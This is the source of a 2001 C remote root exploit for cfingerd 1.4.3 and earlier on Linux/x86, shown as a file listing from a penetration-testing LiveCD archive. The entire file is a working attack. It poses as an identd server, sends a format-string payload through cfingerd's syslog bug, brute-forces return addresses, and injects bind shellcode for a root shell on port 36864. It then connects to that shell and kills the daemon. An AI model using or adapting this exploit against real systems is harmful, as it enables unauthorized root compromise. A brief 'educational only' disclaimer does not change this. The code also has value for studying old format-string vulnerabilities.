home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / finger / cfingerd / rdC-cfingerd.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  12.7 KB  |  516 lines
  1. /* remote exploit for linux/x86 - cfingerd <= 1.4.3
  2.  * coded by venomous of rdC - 16/apr/01
  3.  *
  4.  * Its just a common formatstring bug using syslog() incorrectly.
  5.  * We need to bind as identd, so disable your identd in case you are
  6.  * using it.
  7.  *
  8.  * BONUS: eip address is bruteforced, so relax and wait =)
  9.  *
  10.  * NOTE: for sure where we control the format string will change from
  11.  *       platform to platform.
  12.  *       And for sure, the shellcode address will change so maybe you
  13.  *       want to bruteforce this too. (-1500 to +1500 should be fine i guess)
  14.  *
  15.  * REMEMBER: this code is for educational propourses only, do not use
  16.  *           it on machines without authorization.
  17.  *
  18.  * INFO: cfingerd isnt a package of slackware 7.0
  19.  *       cfingerd 1.4.1 is a package of debian 2.2
  20.  *
  21.  * Greets: ka0z, bruj0, dn0, superluck, fugitivo(!)
  22.  *         #flatline, #rdC
  23.  *
  24.  * Credits: To Lez, who found this bug.
  25.  *
  26.  * http://www.rdcrew.com.ar - Argentinian Security Group.
  27.  * venomous@rdcrew.com.ar
  28.  */
  29.  
  30.  
  31. #include <stdio.h>
  32. #include <netinet/in.h>
  33. #include <sys/types.h>
  34. #include <sys/socket.h>
  35. #include <netdb.h>
  36. #include <signal.h>
  37. #include <sys/types.h>
  38. #include <sys/wait.h>
  39. #include <unistd.h>
  40.  
  41. #define ROOTSHELLPORT 36864
  42.  
  43. void chld_timeo();
  44. void chld_timeoo();
  45.  
  46. int sserver;
  47. int cserver;
  48. int phase=0;
  49. int mmm=0;
  50.  
  51. unsigned long glob;
  52. //unsigned long startaddr = 0xbffffdfc;
  53. unsigned long startaddr = 0xbffffb34;
  54. unsigned long stopaddr  = 0xbffff000;
  55.  
  56. char pbuf[1024];
  57.  
  58. char testcode[]=
  59.     "\xeb\x0b\x2e\x72\x64\x43\x2e\x72\x6f\x63\x6b\x73\x2e\xeb\xfe";
  60.  
  61. char linuxcode[]=
  62.     /* Lamagra bind shellcode modified by me, making it smaller =) - 124b */
  63.     "\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
  64.     "\x40\x89\xc3\x89\x46\x0c\x40\x89"
  65.     "\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
  66.     "\x80\x43\xc6\x46\x10\x10\x88\x46"
  67.     "\x08\x31\xc0\x31\xd2\x89\x46\x18"
  68.     "\xb0\x90\x66\x89\x46\x16\x8d\x4e"
  69.     "\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
  70.     "\x66\xcd\x80\x89\x5e\x0c\x43\x43"
  71.     "\xb0\x66\xcd\x80\x89\x56\x0c\x89"
  72.     "\x56\x10\xb0\x66\x43\xcd\x80\x86"
  73.     "\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
  74.     "\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
  75.     "\x80\x88\x56\x07\x89\x76\x0c\x87"
  76.     "\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
  77.     "\xe8\x8d\xff\xff\xff\x2f\x62\x69"
  78.     "\x6e\x2f\x73\x68";
  79.  
  80. struct os
  81. {
  82.     int id;
  83.     char *os;
  84.     char *shellcode;
  85.     int fsc;
  86.     unsigned long shaddr;
  87.     int offset;
  88. };
  89.  
  90. struct os types[]=
  91. {
  92.     {0, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as root",
  93. linuxcode, 22, 0xbffffbc4, 30},
  94.     {1, "slackware 7.0 - compiled cfingerd 1.4.2/1.4.3 running from inetd as nobody",
  95. linuxcode, 22, 0xbffffbc4, 30},
  96.     {2, "debian 2.2 - default cfingerd 1.4.1 running from inetd as root", linuxcode, 33,
  97. 0xbffffb48, 0},
  98.     {3, "debian 2.2 - default cfingerd 1.4.1 running from inetd as nobody", linuxcode, 33,
  99. 0xbffffb48, 0},
  100.     {4, NULL, 0, 0xdeadbeef, 0}
  101. };
  102.  
  103. main(int argc, char *argv[])
  104. {
  105.     struct sockaddr_in sin;
  106.     struct sockaddr_in ssin;
  107.     int fd;
  108.     int x;
  109.     int xx=0;
  110.     int sts=0;
  111.     int pete;
  112.     int a,b,c=22,d=0; /* c is used in case you want to seek the fsc on   */
  113.     int guide=1;      /* your system, starting from 22, change it if you */
  114.     int sel=0;        /* want.                                           */
  115.     int bleh=0;       /*                                                 */
  116.     int off=0;
  117.     int arx=0;
  118.     int niu=0;
  119.     int ye=0;
  120.     char buf[1024];
  121.     char tex[512];
  122.  
  123.     if (argc < 4)
  124.     {
  125.         printf("cfingerd <= 1.4.3 remote exploit coded by venomous of rdC\n\n");
  126.         printf("Usage: %s <platform> <host> <offset>\n",argv[0]);
  127.         printf("where <platform> is:\n");
  128.         for (x=0 ; types[x].os != NULL ; x++)
  129.             printf("%d for %s\n", types[x].id, types[x].os);
  130.         printf("\nhttp://www.rdcrew.com.ar\n\n");
  131.         exit(1);
  132.     }
  133.  
  134.     for (x=0 ; types[x].os != NULL ; x++)
  135.     {
  136.         if (types[x].id == atoi(argv[1]) )
  137.         {
  138.             xx++;
  139.             sel = types[x].id;
  140.         }
  141.     }
  142.     if (!xx)
  143.     {
  144.         printf("Unknown platform: %s\n",argv[1]);
  145.         exit(1);
  146.     }
  147.  
  148.     off = atoi(argv[3]);
  149.     printf("Selected platform: %s (%d)\n",types[sel].os,sel);
  150.     bzero(&sin,sizeof(sin));
  151.  
  152.     // fake identd
  153.     sin.sin_family = AF_INET;
  154.     sin.sin_port = htons(113);
  155.     sin.sin_addr.s_addr = htonl(INADDR_ANY);
  156.  
  157.     if ( (fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  158.     {
  159.         perror("socket");
  160.         exit(1);
  161.     }
  162.     if ( (x = bind(fd,(struct sockaddr *)&sin, sizeof(sin)) < 0))
  163.     {
  164.         perror("bind");
  165.         exit(1);
  166.     }
  167.  
  168.     if ( (xx = listen(fd, 5)) < 0)
  169.     {
  170.         perror("listen");
  171.         exit(1);
  172.     }
  173.  
  174.     printf("fake identd bound successfuly\n\n");
  175.     printf("pre-phase info: If you need to use the offset you can use safely steps of
  176. 120\n\n");
  177.     printf("phase 0: finding eip...  \n");
  178.     while (guide)
  179.     {
  180.         //maybe you need it..
  181.         //        if (!d)
  182.         //        {
  183.         preparebuf(sel, off, ye);
  184.         fconnect(argv[2], ye, 79);
  185.         //        }
  186.  
  187.         pete = sizeof(ssin);
  188.         if ( (sserver = accept(fd, (struct sockaddr *)&ssin, &pete)) < 0)
  189.         {
  190.             perror("accept");
  191.             exit(1);
  192.         }
  193.         bzero(buf,sizeof(buf));
  194.         read(sserver,buf,sizeof(buf));
  195.  
  196.         //horrendus debug! :)
  197. #ifdef DEBUG
  198.         printf("\nread(): %s\n",buf);
  199. #endif
  200.         sscanf(buf,"%d,%d",&a,&b);
  201.         bzero(buf,sizeof(buf));
  202.         bzero(tex,sizeof(tex));
  203.         memset(tex,'\x90',119);
  204.  
  205.         bleh=strlen(pbuf);
  206.         niu = 0;
  207.  
  208.         while (1)
  209.         {
  210.             if(strlen(pbuf) < 65)
  211.             {
  212.                 if (phase==0)
  213.                     pbuf[bleh] = '\x90';
  214.                 else
  215.                     pbuf[bleh] = types[sel].shellcode[niu];
  216.                 bleh++;
  217.                 if (phase==1)
  218.                     niu++;
  219.             }
  220.             else
  221.                 break;
  222.         }
  223.         arx = niu;
  224.  
  225.         if(!phase)
  226.             for(bleh=0 ; bleh < strlen(testcode) ; bleh++)
  227.                 tex[119 - strlen(testcode) + bleh] = testcode[bleh];
  228.  
  229.         else
  230.         {
  231.             if ((119 - (strlen(types[sel].shellcode) - arx)) < 0)
  232.             {
  233.                 printf("shellcode too long, exiting\n");
  234.                 exit(0);
  235.             }
  236.  
  237.             for ( bleh=0 ; bleh < ( (strlen(types[sel].shellcode)) - arx) ; bleh++)
  238.                 tex[119 - (strlen(types[sel].shellcode)) - arx + bleh] =
  239. types[sel].shellcode[bleh+arx];
  240.         }
  241.  
  242.         snprintf(buf,sizeof(buf),"%s : : : %s", tex, pbuf);
  243.         /* usefull for find the fsc on your system.
  244.          //snprintf(buf,sizeof(buf),"%d , %d : UNIX : 1 : AAAA%%%d$p:fsc:%d\n",a,b,c,c);
  245.         // read about 'd' below
  246.         if (d==2) { c++; d=0; }
  247.         */
  248.         write(sserver,buf,sizeof(buf));
  249.  
  250.         //the same..
  251. #ifdef DEBUG
  252.         printf("sent: %s\n--------------------\n",buf);
  253. #endif
  254.         close(sserver);
  255.         sleep(2);
  256.  
  257.         //same..
  258.         //      if(d)
  259.         wait(&sts);
  260.         //      d++;
  261.  
  262.         /* if something like tcplogd is running there will be 3 connections
  263.          * to identd, so in that case, d==3
  264.          */
  265.         //if(d==2)
  266.         //    d=0;
  267.  
  268.         if ((WEXITSTATUS(sts)) == 1) // eip/shellcode address ok (at phase 0)
  269.         {
  270.             phase=1; ye=1; sts=0;
  271.             printf("\nphase 1: calculating address of the first chacarcter in our buffer...
  272. wait\n");
  273.         }
  274.  
  275.         if ((WEXITSTATUS(sts)) == 2) // shellcode executed (at phase 1)
  276.         {
  277.             printf("\nphase 2 connecting to rootshell... ");
  278.             fflush(stdout);
  279.             close(fd); //identd fake server
  280.             fconnect(argv[2], 2, ROOTSHELLPORT);
  281.             printf("\n\nThanks for using rdC products!\n\n");
  282.             exit(0);
  283.         }
  284.     }
  285. }
  286.  
  287. int fconnect(char *hname, int what, int port)
  288. {
  289.     struct hostent *host;
  290.     struct sockaddr_in d;
  291.     int r;
  292.     char hname2[128];
  293.     char response[1024];
  294.     d.sin_family = AF_INET;
  295.     d.sin_port = htons(port);
  296.  
  297.     bzero(hname2,sizeof(hname2));
  298.     strncpy(hname2,hname,sizeof(hname2));
  299.     host = gethostbyname(hname2);
  300.     if (!host)
  301.     {
  302.         printf("cannot resolve\n");
  303.         exit(0);
  304.     }
  305.  
  306.     bcopy(host->h_addr, (struct in_addr *)&d.sin_addr, host->h_length);
  307.  
  308.     cserver = socket(AF_INET, SOCK_STREAM, 0);
  309.  
  310.     // you can add a timeout here, but supossly you know if the server
  311.     // is up/not firewalled, because you are using it against an authorized
  312.     // machine and not in a script/not authorized machine, right?
  313.  
  314.     if (connect(cserver, (struct sockaddr *)&d, sizeof(struct sockaddr)) < 0)
  315.     {
  316.         perror("connect");
  317.         exit(1);
  318.     }
  319.  
  320.     if (what==2)
  321.     {
  322.         printf("connected!\n");
  323.         fflush(stdout);
  324.         rootsox(cserver);
  325.         close(cserver);
  326.         return;
  327.     }
  328.  
  329.     write(cserver,"a\n",strlen("a\n"));
  330.  
  331.     if ((fork()) == 0)
  332.     {
  333.         printf("Waiting response...");
  334.         for(r=0 ; r < 19 ; r++)
  335.             printf("\b");
  336.         fflush(stdout);
  337.         bzero(response,sizeof(response));
  338.         if (what==0)
  339.             signal(SIGALRM, chld_timeo);
  340.         else
  341.             signal(SIGALRM, chld_timeoo);
  342.  
  343.         alarm(30);
  344.         read(cserver,response,sizeof(response));
  345.         if (strstr(response,"SIGILL"))
  346.         {
  347.             printf("Illegal Instruction\r");
  348.             fflush(stdout);
  349.             close(cserver);
  350.             exit(0);
  351.         }
  352.         if (strstr(response,"SIGSEGV"))
  353.         {
  354.             printf("Segmentation Fault.\r");
  355.             fflush(stdout);
  356.             close(cserver);
  357.             exit(0);
  358.         }
  359.         //you might add strings here..
  360.         if (strstr(response,"Sorry, that user doesn't exist") || strstr(response,"Debian
  361. GNU/Linux"))
  362.         {
  363.             printf("server not crashed.\r");
  364.             fflush(stdout);
  365.             close(cserver);
  366.             exit(0);
  367.         }
  368.     }
  369.     //close(cserver);
  370. }
  371.  
  372. /* <huh> */
  373. void chld_timeo()
  374. {
  375.     alarm(0);
  376.     signal(SIGALRM, SIG_DFL);
  377.     printf("EIP FOUND! - SHELLCODE ADDR OK!\n");
  378.     fflush(stdout);
  379.     close(cserver);
  380.     exit(1);
  381. }
  382.  
  383. void chld_timeoo()
  384. {
  385.     alarm(0);
  386.     signal(SIGALRM, SIG_DFL);
  387.     printf("shellcode executed!\n");
  388.     fflush(stdout);
  389.     close(cserver);
  390.     exit(2);
  391. }
  392. /* </huh> */
  393.  
  394. int rootsox(int sox)
  395. {
  396.     fd_set  rset;
  397.     int     n;
  398.     char    buffer[4096];
  399.  
  400.     /* we kill the cfingerd in eternal loop and we run other nice commands ;)
  401.      */
  402.     char *command="/bin/killall -9 cfingerd ; /bin/uname -a ; /usr/bin/id\n";
  403.  
  404.     send(sox, command, strlen(command), 0);
  405.  
  406.     for (;;) {
  407.         FD_ZERO (&rset);
  408.         FD_SET (sox, &rset);
  409.         FD_SET (STDIN_FILENO, &rset);
  410.  
  411.         n = select(sox + 1, &rset, NULL, NULL, NULL);
  412.         if(n <= 0)
  413.             return (-1);
  414.  
  415.         if(FD_ISSET (sox, &rset)) {
  416.             n = recv (sox, buffer, sizeof (buffer), 0);
  417.             if (n <= 0)
  418.                 break;
  419.  
  420.             write (STDOUT_FILENO, buffer, n);
  421.         }
  422.  
  423.         if(FD_ISSET (STDIN_FILENO, &rset)) {
  424.             n = read (STDIN_FILENO, buffer, sizeof (buffer));
  425.             if (n <= 0)
  426.                 break;
  427.  
  428.             send(sox, buffer, n, 0);
  429.         }
  430.     }
  431.     return 0;
  432. }
  433.  
  434. //heavly modified formatstring engine from rdC-LPRng.c exploit - 12/00
  435. preparebuf(int sel, int off, int what)
  436. {
  437.     unsigned long addr;
  438.     unsigned long a, b, c, d;
  439.     int pas1,pas2,pas3,pas4;
  440.     int i;
  441.     char temp[512];
  442.     char buf[512];
  443.     char atemp[128];
  444.     char bufx[512];
  445.  
  446.     startaddr = startaddr - 0x4;
  447.     addr = startaddr;
  448.  
  449.     bzero(temp,sizeof(temp));
  450.     bzero(buf,sizeof(buf));
  451.     bzero(bufx,sizeof(bufx));
  452.     bzero(atemp,sizeof(atemp));
  453.  
  454.     if (addr == stopaddr)
  455.     {
  456.         printf("\nreached stopaddr, change shellcode address/fsc\n");
  457.         exit(1);
  458.     }
  459.  
  460.     if(what)
  461.     {
  462.         off-=mmm;
  463.         mmm++;
  464.     }
  465.  
  466.     if (mmm == 185)
  467.     {
  468.         printf("?!.. we cant find the first character of our shellcode!#@\n");
  469.         exit(0);
  470.     }
  471.  
  472.     snprintf(temp,sizeof(temp),"%p",types[sel].shaddr+types[sel].offset+off);
  473.     sscanf(temp,"0x%2x%2x%2x%2x",&a,&b,&c,&d);
  474.     pas1 = d - (16 * 2);
  475.     pas1 = cn(pas1);
  476.     pas2 = c - d;
  477.     pas2 = cn(pas2);
  478.     pas3 = b - c;
  479.     pas3 = cn(pas3);
  480.     pas4 = a - b;
  481.     pas4 = cn(pas4);
  482.  
  483.     if(what)
  484.         addr = glob;
  485.     else
  486.         glob = addr;
  487.  
  488.     printf("eip: %p - shellcode addr: %p - ",addr,types[sel].shaddr+types[sel].offset+off);
  489.     fflush(stdout);
  490.  
  491.     for (i=0 ; i < 4 ; i++)
  492.     {
  493.         snprintf(atemp,sizeof(atemp),"%s",&addr);
  494.         strncat(buf, atemp, 4);
  495.         addr++;
  496.     }
  497.  
  498.  
  499. snprintf(bufx,sizeof(bufx),"%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n",pas1,(types[sel].fsc),pas2,(types[sel].fsc)+1,pas3,(types[sel].fsc)+2,pas4,types[sel].fsc+3);
  500.     strcat(buf,bufx);
  501.     bzero(pbuf,sizeof(pbuf));
  502.     strncpy(pbuf,buf,sizeof(pbuf));
  503. }
  504.  
  505. cn(unsigned long addr)
  506. {
  507.     char he[128];
  508.  
  509.     snprintf(he,sizeof(he),"%d",addr);
  510.     if (atoi(he) < 8)
  511.         addr = addr + 256;
  512.  
  513.     return addr;
  514. }
  515.  
  516.